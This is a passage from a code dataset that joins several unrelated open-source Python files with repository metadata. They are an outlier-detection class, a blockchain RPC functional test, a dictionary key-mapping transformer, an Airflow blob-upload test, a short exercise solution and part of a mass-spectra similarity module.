obs = X[i]
ref = X[ref_inds[i,],]
means = np.mean(ref, axis=0) # mean of each column
# average squared distance of the reference to the mean
var_total = np.sum(np.sum(np.square(ref - means))) / self.ref_set_
var_expect = self.alpha_ * var_total / X.shape[1]
var_actual = np.var(ref, axis=0) # variance of each attribute
var_inds = [1 if (j < var_expect) else 0 for j in var_actual]
rel_dim = np.sum(var_inds)
if rel_dim != 0:
anomaly_scores[i] = np.sqrt(
np.dot(var_inds, np.square(obs - means)) / rel_dim)
return anomaly_scores
| 35.164179
| 79
| 0.621817
|
import numpy as np
import numba as nb
from sklearn.neighbors import NearestNeighbors
from sklearn.utils import check_array
from ..utils.utility import check_parameter
from .base import BaseDetector
@nb.njit(parallel=True)
def _snn_imp(ind, ref_set_):
n = ind.shape[0]
_count = np.zeros(shape=(n, ref_set_), dtype=np.uint32)
for i in nb.prange(n):
temp = np.empty(n, dtype=np.uint32)
test_element_set = set(ind[i])
for j in nb.prange(n):
temp[j] = len(set(ind[j]).intersection(test_element_set))
temp[i] = np.iinfo(np.uint32).max
_count[i] = np.argsort(temp)[::-1][1:ref_set_ + 1]
return _count
class SOD(BaseDetector):
def __init__(self, contamination=0.1, n_neighbors=20, ref_set=10,
alpha=0.8):
super(SOD, self).__init__(contamination=contamination)
if isinstance(n_neighbors, int):
check_parameter(n_neighbors, low=1, param_name='n_neighbors')
else:
raise ValueError(
"n_neighbors should be int. Got %s" % type(n_neighbors))
if isinstance(ref_set, int):
check_parameter(ref_set, low=1, high=n_neighbors,
param_name='ref_set')
else:
raise ValueError("ref_set should be int. Got %s" % type(ref_set))
if isinstance(alpha, float):
check_parameter(alpha, low=0.0, high=1.0, param_name='alpha')
else:
raise ValueError("alpha should be float. Got %s" % type(alpha))
self.n_neighbors_ = n_neighbors
self.ref_set_ = ref_set
self.alpha_ = alpha
self.decision_scores_ = None
def fit(self, X, y=None):
X = check_array(X)
self._set_n_classes(y)
self.decision_scores_ = self.decision_function(X)
self._process_decision_scores()
return self
def decision_function(self, X):
return self._sod(X)
def _snn(self, X):
knn = NearestNeighbors(n_neighbors=self.n_neighbors_)
knn.fit(X)
ind = knn.kneighbors(return_distance=False)
return _snn_imp(ind, self.ref_set_)
def _sod(self, X):
ref_inds = self._snn(X)
anomaly_scores = np.zeros(shape=(X.shape[0],))
for i in range(X.shape[0]):
obs = X[i]
ref = X[ref_inds[i,],]
means = np.mean(ref, axis=0)
var_total = np.sum(np.sum(np.square(ref - means))) / self.ref_set_
var_expect = self.alpha_ * var_total / X.shape[1]
var_actual = np.var(ref, axis=0)
var_inds = [1 if (j < var_expect) else 0 for j in var_actual]
rel_dim = np.sum(var_inds)
if rel_dim != 0:
anomaly_scores[i] = np.sqrt(
np.dot(var_inds, np.square(obs - means)) / rel_dim)
return anomaly_scores
| true
| true
|
790db68297454438cd4748af30d715a7558e6fe2
| 7,042
|
py
|
Python
|
test/functional/rpc_getblockstats.py
|
blinkhash/blinkhash-core
|
e05662019c2fa4cb2dc3736f38e48492712c23b1
|
[
"MIT"
] | 3
|
2021-07-27T16:59:47.000Z
|
2021-12-31T20:55:46.000Z
|
test/functional/rpc_getblockstats.py
|
blinkhash/blinkhash-core
|
e05662019c2fa4cb2dc3736f38e48492712c23b1
|
[
"MIT"
] | null | null | null |
test/functional/rpc_getblockstats.py
|
blinkhash/blinkhash-core
|
e05662019c2fa4cb2dc3736f38e48492712c23b1
|
[
"MIT"
] | 1
|
2021-12-31T12:58:23.000Z
|
2021-12-31T12:58:23.000Z
|
#!/usr/bin/env python3
# Copyright (c) 2017-2021 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Test getblockstats rpc call
#
from test_framework.blocktools import COINBASE_MATURITY
from test_framework.test_framework import BlinkhashTestFramework
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
)
import json
import os
TESTSDIR = os.path.dirname(os.path.realpath(__file__))
class GetblockstatsTest(BlinkhashTestFramework):
start_height = 101
max_stat_pos = 2
def add_options(self, parser):
parser.add_argument('--gen-test-data', dest='gen_test_data',
default=False, action='store_true',
help='Generate test data')
parser.add_argument('--test-data', dest='test_data',
default='data/rpc_getblockstats.json',
action='store', metavar='FILE',
help='Test data file')
def set_test_params(self):
self.num_nodes = 1
self.setup_clean_chain = True
self.supports_cli = False
def get_stats(self):
return [self.nodes[0].getblockstats(hash_or_height=self.start_height + i) for i in range(self.max_stat_pos+1)]
def generate_test_data(self, filename):
mocktime = 1525107225
self.nodes[0].setmocktime(mocktime)
self.nodes[0].createwallet(wallet_name="testwallet")
self.nodes[0].generatetoaddress(COINBASE_MATURITY + 1, self.nodes[0].getnewaddress())
address = self.nodes[0].get_deterministic_priv_key().address
self.nodes[0].sendtoaddress(address=address, amount=10, subtractfeefromamount=True)
self.generate(self.nodes[0], 1)
self.nodes[0].sendtoaddress(address=address, amount=10, subtractfeefromamount=True)
self.nodes[0].sendtoaddress(address=address, amount=10, subtractfeefromamount=False)
self.nodes[0].settxfee(amount=0.003)
self.nodes[0].sendtoaddress(address=address, amount=1, subtractfeefromamount=True)
self.sync_all()
self.generate(self.nodes[0], 1)
self.expected_stats = self.get_stats()
blocks = []
tip = self.nodes[0].getbestblockhash()
blockhash = None
height = 0
while tip != blockhash:
blockhash = self.nodes[0].getblockhash(height)
blocks.append(self.nodes[0].getblock(blockhash, 0))
height += 1
to_dump = {
'blocks': blocks,
'mocktime': int(mocktime),
'stats': self.expected_stats,
}
with open(filename, 'w', encoding="utf8") as f:
json.dump(to_dump, f, sort_keys=True, indent=2)
def load_test_data(self, filename):
with open(filename, 'r', encoding="utf8") as f:
d = json.load(f)
blocks = d['blocks']
mocktime = d['mocktime']
self.expected_stats = d['stats']
# Set the timestamps from the file so that the nodes can get out of Initial Block Download
self.nodes[0].setmocktime(mocktime)
self.sync_all()
for b in blocks:
self.nodes[0].submitblock(b)
def run_test(self):
test_data = os.path.join(TESTSDIR, self.options.test_data)
if self.options.gen_test_data:
self.generate_test_data(test_data)
else:
self.load_test_data(test_data)
self.sync_all()
stats = self.get_stats()
# Make sure all valid statistics are included but nothing else is
expected_keys = self.expected_stats[0].keys()
assert_equal(set(stats[0].keys()), set(expected_keys))
assert_equal(stats[0]['height'], self.start_height)
assert_equal(stats[self.max_stat_pos]['height'], self.start_height + self.max_stat_pos)
for i in range(self.max_stat_pos+1):
self.log.info('Checking block %d\n' % (i))
assert_equal(stats[i], self.expected_stats[i])
# Check selecting block by hash too
blockhash = self.expected_stats[i]['blockhash']
stats_by_hash = self.nodes[0].getblockstats(hash_or_height=blockhash)
assert_equal(stats_by_hash, self.expected_stats[i])
# Make sure each stat can be queried on its own
for stat in expected_keys:
for i in range(self.max_stat_pos+1):
result = self.nodes[0].getblockstats(hash_or_height=self.start_height + i, stats=[stat])
assert_equal(list(result.keys()), [stat])
if result[stat] != self.expected_stats[i][stat]:
self.log.info('result[%s] (%d) failed, %r != %r' % (
stat, i, result[stat], self.expected_stats[i][stat]))
assert_equal(result[stat], self.expected_stats[i][stat])
# Make sure only the selected statistics are included (more than one)
some_stats = {'minfee', 'maxfee'}
stats = self.nodes[0].getblockstats(hash_or_height=1, stats=list(some_stats))
assert_equal(set(stats.keys()), some_stats)
# Test invalid parameters raise the proper json exceptions
tip = self.start_height + self.max_stat_pos
assert_raises_rpc_error(-8, 'Target block height %d after current tip %d' % (tip+1, tip),
self.nodes[0].getblockstats, hash_or_height=tip+1)
assert_raises_rpc_error(-8, 'Target block height %d is negative' % (-1),
self.nodes[0].getblockstats, hash_or_height=-1)
# Make sure not valid stats aren't allowed
inv_sel_stat = 'asdfghjkl'
inv_stats = [
[inv_sel_stat],
['minfee' , inv_sel_stat],
[inv_sel_stat, 'minfee'],
['minfee', inv_sel_stat, 'maxfee'],
]
for inv_stat in inv_stats:
assert_raises_rpc_error(-8, 'Invalid selected statistic %s' % inv_sel_stat,
self.nodes[0].getblockstats, hash_or_height=1, stats=inv_stat)
# Make sure we aren't always returning inv_sel_stat as the culprit stat
assert_raises_rpc_error(-8, 'Invalid selected statistic aaa%s' % inv_sel_stat,
self.nodes[0].getblockstats, hash_or_height=1, stats=['minfee' , 'aaa%s' % inv_sel_stat])
# Mainchain's genesis block shouldn't be found on regtest
assert_raises_rpc_error(-5, 'Block not found', self.nodes[0].getblockstats,
hash_or_height='000000000019d6689c085ae165831e934ff763ae46a2a6c172b3f1b60a8ce26f')
# Invalid number of args
assert_raises_rpc_error(-1, 'getblockstats hash_or_height ( stats )', self.nodes[0].getblockstats, '00', 1, 2)
assert_raises_rpc_error(-1, 'getblockstats hash_or_height ( stats )', self.nodes[0].getblockstats)
if __name__ == '__main__':
GetblockstatsTest().main()
| 41.916667
| 121
| 0.629225
|
from test_framework.blocktools import COINBASE_MATURITY
from test_framework.test_framework import BlinkhashTestFramework
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
)
import json
import os
TESTSDIR = os.path.dirname(os.path.realpath(__file__))
class GetblockstatsTest(BlinkhashTestFramework):
start_height = 101
max_stat_pos = 2
def add_options(self, parser):
parser.add_argument('--gen-test-data', dest='gen_test_data',
default=False, action='store_true',
help='Generate test data')
parser.add_argument('--test-data', dest='test_data',
default='data/rpc_getblockstats.json',
action='store', metavar='FILE',
help='Test data file')
def set_test_params(self):
self.num_nodes = 1
self.setup_clean_chain = True
self.supports_cli = False
def get_stats(self):
return [self.nodes[0].getblockstats(hash_or_height=self.start_height + i) for i in range(self.max_stat_pos+1)]
def generate_test_data(self, filename):
mocktime = 1525107225
self.nodes[0].setmocktime(mocktime)
self.nodes[0].createwallet(wallet_name="testwallet")
self.nodes[0].generatetoaddress(COINBASE_MATURITY + 1, self.nodes[0].getnewaddress())
address = self.nodes[0].get_deterministic_priv_key().address
self.nodes[0].sendtoaddress(address=address, amount=10, subtractfeefromamount=True)
self.generate(self.nodes[0], 1)
self.nodes[0].sendtoaddress(address=address, amount=10, subtractfeefromamount=True)
self.nodes[0].sendtoaddress(address=address, amount=10, subtractfeefromamount=False)
self.nodes[0].settxfee(amount=0.003)
self.nodes[0].sendtoaddress(address=address, amount=1, subtractfeefromamount=True)
self.sync_all()
self.generate(self.nodes[0], 1)
self.expected_stats = self.get_stats()
blocks = []
tip = self.nodes[0].getbestblockhash()
blockhash = None
height = 0
while tip != blockhash:
blockhash = self.nodes[0].getblockhash(height)
blocks.append(self.nodes[0].getblock(blockhash, 0))
height += 1
to_dump = {
'blocks': blocks,
'mocktime': int(mocktime),
'stats': self.expected_stats,
}
with open(filename, 'w', encoding="utf8") as f:
json.dump(to_dump, f, sort_keys=True, indent=2)
def load_test_data(self, filename):
with open(filename, 'r', encoding="utf8") as f:
d = json.load(f)
blocks = d['blocks']
mocktime = d['mocktime']
self.expected_stats = d['stats']
self.nodes[0].setmocktime(mocktime)
self.sync_all()
for b in blocks:
self.nodes[0].submitblock(b)
def run_test(self):
test_data = os.path.join(TESTSDIR, self.options.test_data)
if self.options.gen_test_data:
self.generate_test_data(test_data)
else:
self.load_test_data(test_data)
self.sync_all()
stats = self.get_stats()
expected_keys = self.expected_stats[0].keys()
assert_equal(set(stats[0].keys()), set(expected_keys))
assert_equal(stats[0]['height'], self.start_height)
assert_equal(stats[self.max_stat_pos]['height'], self.start_height + self.max_stat_pos)
for i in range(self.max_stat_pos+1):
self.log.info('Checking block %d\n' % (i))
assert_equal(stats[i], self.expected_stats[i])
blockhash = self.expected_stats[i]['blockhash']
stats_by_hash = self.nodes[0].getblockstats(hash_or_height=blockhash)
assert_equal(stats_by_hash, self.expected_stats[i])
for stat in expected_keys:
for i in range(self.max_stat_pos+1):
result = self.nodes[0].getblockstats(hash_or_height=self.start_height + i, stats=[stat])
assert_equal(list(result.keys()), [stat])
if result[stat] != self.expected_stats[i][stat]:
self.log.info('result[%s] (%d) failed, %r != %r' % (
stat, i, result[stat], self.expected_stats[i][stat]))
assert_equal(result[stat], self.expected_stats[i][stat])
some_stats = {'minfee', 'maxfee'}
stats = self.nodes[0].getblockstats(hash_or_height=1, stats=list(some_stats))
assert_equal(set(stats.keys()), some_stats)
tip = self.start_height + self.max_stat_pos
assert_raises_rpc_error(-8, 'Target block height %d after current tip %d' % (tip+1, tip),
self.nodes[0].getblockstats, hash_or_height=tip+1)
assert_raises_rpc_error(-8, 'Target block height %d is negative' % (-1),
self.nodes[0].getblockstats, hash_or_height=-1)
inv_sel_stat = 'asdfghjkl'
inv_stats = [
[inv_sel_stat],
['minfee' , inv_sel_stat],
[inv_sel_stat, 'minfee'],
['minfee', inv_sel_stat, 'maxfee'],
]
for inv_stat in inv_stats:
assert_raises_rpc_error(-8, 'Invalid selected statistic %s' % inv_sel_stat,
self.nodes[0].getblockstats, hash_or_height=1, stats=inv_stat)
# Make sure we aren't always returning inv_sel_stat as the culprit stat
assert_raises_rpc_error(-8, 'Invalid selected statistic aaa%s' % inv_sel_stat,
self.nodes[0].getblockstats, hash_or_height=1, stats=['minfee' , 'aaa%s' % inv_sel_stat])
assert_raises_rpc_error(-5, 'Block not found', self.nodes[0].getblockstats,
hash_or_height='000000000019d6689c085ae165831e934ff763ae46a2a6c172b3f1b60a8ce26f')
assert_raises_rpc_error(-1, 'getblockstats hash_or_height ( stats )', self.nodes[0].getblockstats, '00', 1, 2)
assert_raises_rpc_error(-1, 'getblockstats hash_or_height ( stats )', self.nodes[0].getblockstats)
if __name__ == '__main__':
GetblockstatsTest().main()
| true
| true
|
790db7299eb21cb742977befe834ae4e20ae0093
| 4,040
|
py
|
Python
|
transformer/transformers/map_keys.py
|
santunioni/transformer
|
a34b8b40cba81382c8483d590050c3e36cee5bff
|
[
"MIT"
] | 1
|
2022-02-21T22:15:08.000Z
|
2022-02-21T22:15:08.000Z
|
transformer/transformers/map_keys.py
|
santunioni/Transformer
|
a34b8b40cba81382c8483d590050c3e36cee5bff
|
[
"MIT"
] | null | null | null |
transformer/transformers/map_keys.py
|
santunioni/Transformer
|
a34b8b40cba81382c8483d590050c3e36cee5bff
|
[
"MIT"
] | null | null | null |
from typing import Any, Dict, Mapping, Optional, Set
from pydantic import validator
from transformer.transformers.abstract import ExtraHashableModel, Transformer
from transformer.transformers.flatters import Flatter, FlatterConfig, Unflatter
class ReportMissingData(Exception):
def __init__(self, keys: Set[str]):
self.keys = keys
self.message = f"The keys f{self.keys} are missing in the payload."
class MapKeysConfig(ExtraHashableModel):
"""
This is the configuration for the MapKeys transformer.
In order to call this transformer pass the name "map-keys" and a mapping dict.
"""
mapping: Mapping[str, str]
preserve_unmapped: bool = True
ignore_missing_data: bool = True
level_separator: str = "."
return_plain: bool = False
@validator("mapping")
def backwards_compatibility(cls, mapping: Mapping[str, str]):
return {
key.replace(".$[", "["): value.replace(".$[", "[")
for key, value in mapping.items()
}
class MapKeys(Transformer[MapKeysConfig]):
"""
The MapKeys is a complete dict re-designer.
It lets you rename the keys and also restructure the entire dict. Creating new nested data where there wasn't
and also flattening data that was previously nested is possible, all that preserving the data from the input
dictionary.
"""
def __init__(self, config: MapKeysConfig) -> None:
super().__init__(config)
self.__flatters_config = FlatterConfig(level_separator=config.level_separator)
self.__flatter = Flatter(self.__flatters_config)
self.__unflatter = Unflatter(self.__flatters_config)
def transform(
self, payload: Dict[str, Any], metadata: Optional[Dict[str, Any]] = None
):
"""
The mapping is done in 4 major steps:
1. Flattens the data.
2. Metadata Replacers:
Some key mapping parameters are specified in the metadata. Keys that have placeholders like
${metadata_key} will be substituted by values on the specified metadata key.
3. Map Data.
In this moment the keys of the mapping inside config match the keys of the flat payload. That is, the
payload and self._config.mapping have matching keys. Maybe not all keys in payload are in
self._config.mapping, in which case we choose what to do with those extra keys with the config
self._config.preserve_unmapped. If the opposite happens, the self._config.mapping have keys not present
in the payload, the configuration self._config.ignore_missing_data chooses what should be done.
4. Unflattens the data.
:return: transformed and restructured data.
"""
flat_data = self.__flatter.transform(payload)
translated_dict: Dict = {}
map_keys_set = set(self._config.mapping.keys())
for map_key in map_keys_set.intersection(flat_data.keys()):
map_value = self._config.mapping[map_key]
if metadata is not None:
for meta_key, meta_value in metadata.items():
map_key = map_key.replace("@{" + meta_key + "}", str(meta_value))
map_value = map_value.replace(
"@{" + meta_key + "}", str(meta_value)
)
translated_dict[map_value] = flat_data[map_key]
if not self._config.ignore_missing_data:
missing_keys = map_keys_set - flat_data.keys()
if missing_keys:
raise ReportMissingData(missing_keys)
if self._config.preserve_unmapped:
for unmapped_key in flat_data.keys() - self._config.mapping.keys():
translated_dict[unmapped_key] = flat_data[unmapped_key]
if self._config.return_plain:
return translated_dict, metadata
if metadata is None:
return self.__unflatter.transform(translated_dict)
return self.__unflatter.transform(translated_dict, metadata)
| 40.4
| 117
| 0.661634
|
from typing import Any, Dict, Mapping, Optional, Set
from pydantic import validator
from transformer.transformers.abstract import ExtraHashableModel, Transformer
from transformer.transformers.flatters import Flatter, FlatterConfig, Unflatter
class ReportMissingData(Exception):
def __init__(self, keys: Set[str]):
self.keys = keys
self.message = f"The keys f{self.keys} are missing in the payload."
class MapKeysConfig(ExtraHashableModel):
mapping: Mapping[str, str]
preserve_unmapped: bool = True
ignore_missing_data: bool = True
level_separator: str = "."
return_plain: bool = False
@validator("mapping")
def backwards_compatibility(cls, mapping: Mapping[str, str]):
return {
key.replace(".$[", "["): value.replace(".$[", "[")
for key, value in mapping.items()
}
class MapKeys(Transformer[MapKeysConfig]):
def __init__(self, config: MapKeysConfig) -> None:
super().__init__(config)
self.__flatters_config = FlatterConfig(level_separator=config.level_separator)
self.__flatter = Flatter(self.__flatters_config)
self.__unflatter = Unflatter(self.__flatters_config)
def transform(
self, payload: Dict[str, Any], metadata: Optional[Dict[str, Any]] = None
):
flat_data = self.__flatter.transform(payload)
translated_dict: Dict = {}
map_keys_set = set(self._config.mapping.keys())
for map_key in map_keys_set.intersection(flat_data.keys()):
map_value = self._config.mapping[map_key]
if metadata is not None:
for meta_key, meta_value in metadata.items():
map_key = map_key.replace("@{" + meta_key + "}", str(meta_value))
map_value = map_value.replace(
"@{" + meta_key + "}", str(meta_value)
)
translated_dict[map_value] = flat_data[map_key]
if not self._config.ignore_missing_data:
missing_keys = map_keys_set - flat_data.keys()
if missing_keys:
raise ReportMissingData(missing_keys)
if self._config.preserve_unmapped:
for unmapped_key in flat_data.keys() - self._config.mapping.keys():
translated_dict[unmapped_key] = flat_data[unmapped_key]
if self._config.return_plain:
return translated_dict, metadata
if metadata is None:
return self.__unflatter.transform(translated_dict)
return self.__unflatter.transform(translated_dict, metadata)
| true
| true
|
790db8137d4ea765b0aab062d890ecbd67994b6d
| 2,571
|
py
|
Python
|
tests/providers/microsoft/azure/transfers/test_local_to_wasb.py
|
ChaseKnowlden/airflow
|
6b71eac1997a7c0db3b8e3aed6b4e65d01871440
|
[
"Apache-2.0"
] | 15,947
|
2019-01-05T13:51:02.000Z
|
2022-03-31T23:33:16.000Z
|
tests/providers/microsoft/azure/transfers/test_local_to_wasb.py
|
ChaseKnowlden/airflow
|
6b71eac1997a7c0db3b8e3aed6b4e65d01871440
|
[
"Apache-2.0"
] | 14,603
|
2019-01-05T09:43:19.000Z
|
2022-03-31T23:11:59.000Z
|
tests/providers/microsoft/azure/transfers/test_local_to_wasb.py
|
ChaseKnowlden/airflow
|
6b71eac1997a7c0db3b8e3aed6b4e65d01871440
|
[
"Apache-2.0"
] | 8,429
|
2019-01-05T19:45:47.000Z
|
2022-03-31T22:13:01.000Z
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import datetime
import unittest
from unittest import mock
from airflow.models.dag import DAG
from airflow.providers.microsoft.azure.transfers.local_to_wasb import LocalFilesystemToWasbOperator
class TestLocalFilesystemToWasbOperator(unittest.TestCase):
_config = {
'file_path': 'file',
'container_name': 'container',
'blob_name': 'blob',
'wasb_conn_id': 'wasb_default',
'retries': 3,
}
def setUp(self):
args = {'owner': 'airflow', 'start_date': datetime.datetime(2017, 1, 1)}
self.dag = DAG('test_dag_id', default_args=args)
def test_init(self):
operator = LocalFilesystemToWasbOperator(task_id='wasb_operator_1', dag=self.dag, **self._config)
assert operator.file_path == self._config['file_path']
assert operator.container_name == self._config['container_name']
assert operator.blob_name == self._config['blob_name']
assert operator.wasb_conn_id == self._config['wasb_conn_id']
assert operator.load_options == {}
assert operator.retries == self._config['retries']
operator = LocalFilesystemToWasbOperator(
task_id='wasb_operator_2', dag=self.dag, load_options={'timeout': 2}, **self._config
)
assert operator.load_options == {'timeout': 2}
@mock.patch('airflow.providers.microsoft.azure.transfers.local_to_wasb.WasbHook', autospec=True)
def test_execute(self, mock_hook):
mock_instance = mock_hook.return_value
operator = LocalFilesystemToWasbOperator(
task_id='wasb_sensor', dag=self.dag, load_options={'timeout': 2}, **self._config
)
operator.execute(None)
mock_instance.load_file.assert_called_once_with('file', 'container', 'blob', timeout=2)
| 40.171875
| 105
| 0.710618
|
import datetime
import unittest
from unittest import mock
from airflow.models.dag import DAG
from airflow.providers.microsoft.azure.transfers.local_to_wasb import LocalFilesystemToWasbOperator
class TestLocalFilesystemToWasbOperator(unittest.TestCase):
_config = {
'file_path': 'file',
'container_name': 'container',
'blob_name': 'blob',
'wasb_conn_id': 'wasb_default',
'retries': 3,
}
def setUp(self):
args = {'owner': 'airflow', 'start_date': datetime.datetime(2017, 1, 1)}
self.dag = DAG('test_dag_id', default_args=args)
def test_init(self):
operator = LocalFilesystemToWasbOperator(task_id='wasb_operator_1', dag=self.dag, **self._config)
assert operator.file_path == self._config['file_path']
assert operator.container_name == self._config['container_name']
assert operator.blob_name == self._config['blob_name']
assert operator.wasb_conn_id == self._config['wasb_conn_id']
assert operator.load_options == {}
assert operator.retries == self._config['retries']
operator = LocalFilesystemToWasbOperator(
task_id='wasb_operator_2', dag=self.dag, load_options={'timeout': 2}, **self._config
)
assert operator.load_options == {'timeout': 2}
@mock.patch('airflow.providers.microsoft.azure.transfers.local_to_wasb.WasbHook', autospec=True)
def test_execute(self, mock_hook):
mock_instance = mock_hook.return_value
operator = LocalFilesystemToWasbOperator(
task_id='wasb_sensor', dag=self.dag, load_options={'timeout': 2}, **self._config
)
operator.execute(None)
mock_instance.load_file.assert_called_once_with('file', 'container', 'blob', timeout=2)
| true
| true
|
790db84293b6d95fe47f418cd8e8dee9afcd0519
| 461
|
py
|
Python
|
Exercises/Exercises_01/07_exercise.py
|
Szymon-Budziak/ASD_exercises_solutions
|
36ccbdae03a6c7e4ad141a2b7b01bef9353574ee
|
[
"MIT"
] | 7
|
2021-12-28T23:38:42.000Z
|
2022-03-29T16:36:16.000Z
|
Exercises/Exercises_01/07_exercise.py
|
Szymon-Budziak/ASD_exercises_solutions
|
36ccbdae03a6c7e4ad141a2b7b01bef9353574ee
|
[
"MIT"
] | null | null | null |
Exercises/Exercises_01/07_exercise.py
|
Szymon-Budziak/ASD_exercises_solutions
|
36ccbdae03a6c7e4ad141a2b7b01bef9353574ee
|
[
"MIT"
] | 4
|
2021-06-29T20:21:52.000Z
|
2022-03-12T10:04:17.000Z
|
# Dana jest posortowana tablica A[1, ..., n] oraz liczba x. Proszę napisać program, który stwierdza
# czy istnieją indeksy i oraz j takie, że A[i] + A[j] = x.
def sum_search(T, x):
l = 0
r = len(T) - 1
while l <= r:
if T[l] + T[r] == x:
return True
elif T[l] + T[r] > x:
r -= 1
else:
l += 1
return False
T = [2, 5, 8, 12, 16, 19, 20, 25, 34, 55, 81]
x = 37
print(sum_search(T, x))
| 21.952381
| 99
| 0.488069
|
def sum_search(T, x):
l = 0
r = len(T) - 1
while l <= r:
if T[l] + T[r] == x:
return True
elif T[l] + T[r] > x:
r -= 1
else:
l += 1
return False
T = [2, 5, 8, 12, 16, 19, 20, 25, 34, 55, 81]
x = 37
print(sum_search(T, x))
| true
| true
|
790db85459ceb8b54c79ae5345c445b6c1fb5bd1
| 21,310
|
py
|
Python
|
matchms/old/ms_similarity_classical.py
|
matchms/old-iomega-spec2vec
|
216b8f8b5e4ffd320b4575326a05fb6c7cd28223
|
[
"Apache-2.0"
] | null | null | null |
matchms/old/ms_similarity_classical.py
|
matchms/old-iomega-spec2vec
|
216b8f8b5e4ffd320b4575326a05fb6c7cd28223
|
[
"Apache-2.0"
] | null | null | null |
matchms/old/ms_similarity_classical.py
|
matchms/old-iomega-spec2vec
|
216b8f8b5e4ffd320b4575326a05fb6c7cd28223
|
[
"Apache-2.0"
] | 1
|
2020-07-04T23:28:55.000Z
|
2020-07-04T23:28:55.000Z
|
#
# Spec2Vec
#
# Copyright 2019 Netherlands eScience Center
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numba
import numpy as np
from scipy.optimize import linear_sum_assignment
from scipy import spatial
# Add multi core parallelization
from concurrent.futures import ThreadPoolExecutor #, as_completed
# TODO better use joblib ? or dask?
def mol_sim_matrix(fingerprints1,
fingerprints2,
method='cosine',
filename=None,
max_size=1000,
print_progress=True):
"""Create Matrix of all molecular similarities (based on molecular fingerprints).
If filename is not None, the result will be saved as npy.
To create molecular fingerprints see mol_fingerprints() function from MS_functions.
Args:
----
fingerprints1: list
List of molecular fingerprints (numpy arrays).
fingerprints2: list
List of molecular fingerprints (numpy arrays).
method: str
Method to compare molecular fingerprints. Can be 'cosine', 'dice' etc.
(see scipy.spatial.distance.cdist).
filename: str
Filename to save results to. OR: If file already exists it will be
loaded instead.
max_size: int
Maximum size of (sub) all-vs-all matrix to handle in one go. Will split
up larger matrices into
max_size x max_size matrices.
print_progress: bool, optional
If True, print phase of the run to indicate progress. Default = True.
"""
if filename is not None:
try:
molecular_similarities = np.load(filename)
print("Molecular similarity scores found and loaded.")
collect_new_data = False
except FileNotFoundError:
print("Could not find file ", filename)
print("Molecular scores will be calculated from scratch.")
collect_new_data = True
else:
collect_new_data = True
if collect_new_data:
# Create array of all finterprints
fingerprints_arr1 = np.array(fingerprints1)
fingerprints_arr2 = np.array(fingerprints2)
# Calculate all-vs-all similarity matrix (similarity here= 1-distance )
matrix_size = (fingerprints_arr1.shape[0], fingerprints_arr2.shape[0])
molecular_similarities = np.zeros(matrix_size)
# Split large matrices up into smaller ones to track progress
splits = int(np.ceil(matrix_size[0]/max_size) * np.ceil(matrix_size[1]/max_size))
count_splits = 0
for i in range(int(np.ceil(matrix_size[0]/max_size))):
low1 = i * max_size
high1 = min((i + 1) * max_size, matrix_size[0])
for j in range(int(np.ceil(matrix_size[1]/max_size))):
low2 = j * max_size
high2 = min((j + 1) * max_size, matrix_size[1])
molecular_similarities[low1:high1, low2:high2] = 1 - spatial.distance.cdist(
fingerprints_arr1[low1:high1],
fingerprints_arr2[low2:high2],
method
)
# Track progress:
count_splits += 1
if print_progress:
print('\r',
"Calculated submatrix {} out of {}".format(count_splits, splits),
end="")
if print_progress:
print(20 * '--')
print("Succesfully calculated matrix with all-vs-all molecular similarity values.")
if filename is not None:
np.save(filename, molecular_similarities)
print("Matrix was saved under:", filename)
return molecular_similarities
# --------------------------------------------------------------------------------------------------
# ---------------------------- classical spectra similarity measures -------------------------------
# --------------------------------------------------------------------------------------------------
def cosine_score_greedy(spec1,
spec2,
mass_shift,
tol,
min_intens=0,
use_numba=True):
"""Calculate cosine score between spectrum1 and spectrum2.
If mass_shifted = True it will shift the spectra with respect to each other
by difference in their parentmasses.
Args:
----
spec1: Spectrum peaks and intensities as numpy array.
spec2: Spectrum peaks and intensities as numpy array.
tol: float
Tolerance value to define how far two peaks can be apart to still count as match.
min_intens: float
Minimum intensity (relative to max.intensity peak in spectrum). Peaks with lower
intensity will be ignored --> higher min_intens is faster, but less precise.
"""
if spec1.shape[0] == 0 or spec2.shape[0] == 0:
return 0.0, []
# normalize intensities:
spec1[:, 1] = spec1[:, 1]/max(spec1[:, 1])
spec2[:, 1] = spec2[:, 1]/max(spec2[:, 1])
# filter, if wanted:
spec1 = spec1[spec1[:, 1] > min_intens, :]
spec2 = spec2[spec2[:, 1] > min_intens, :]
if use_numba:
zero_pairs = find_pairs_numba(spec1, spec2, tol, shift=0.0)
else:
zero_pairs = find_pairs(spec1, spec2, tol, shift=0.0)
if mass_shift is not None \
and mass_shift != 0.0:
if use_numba:
nonzero_pairs = find_pairs_numba(spec1, spec2, tol, shift=mass_shift)
else:
nonzero_pairs = find_pairs(spec1, spec2, tol, shift=mass_shift)
matching_pairs = zero_pairs + nonzero_pairs
else:
matching_pairs = zero_pairs
matching_pairs = sorted(matching_pairs, key=lambda x: x[2], reverse=True)
used1 = set()
used2 = set()
score = 0.0
used_matches = []
for m in matching_pairs:
if not m[0] in used1 and not m[1] in used2:
score += m[2]
used1.add(m[0])
used2.add(m[1])
used_matches.append(m)
# Normalize score:
score = score/max(np.sum(spec1[:, 1]**2), np.sum(spec2[:, 1]**2))
return score, used_matches
def cosine_score_hungarian(spec1,
spec2,
mass_shift,
tol,
min_intens=0):
"""Taking full care of weighted bipartite matching problem.
Use Hungarian algorithm (slow...)
Args:
--------
spec1: Spectrum peaks and intensities as numpy array.
